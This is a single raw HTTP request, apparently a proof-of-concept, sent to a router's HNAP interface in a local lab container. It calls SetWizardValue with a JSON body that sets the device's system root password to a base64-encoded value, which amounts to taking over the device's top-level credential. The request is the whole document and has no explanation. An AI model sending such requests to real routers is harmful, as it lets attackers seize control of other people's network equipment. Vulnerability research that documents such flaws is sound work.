POST /HNAP1/ HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
SOAPACTION: "http://purenetworks.com/HNAP1/SetWizardValue"
HNAP_AUTH: E5C14446F7156A0DE9E56D8ED83DAA45 1677385906735
Content-Length: 58
Origin: http://172.17.0.2
Connection: keep-alive
Referer: http://172.17.0.2/Wizard.html?t=1677385773083
Cookie: PHPSESSID=03a12b4b0d9ace632e47b3bb41124651

{"SetWizardValue":{"system_root_password":"TlgwUjNvUEg="}}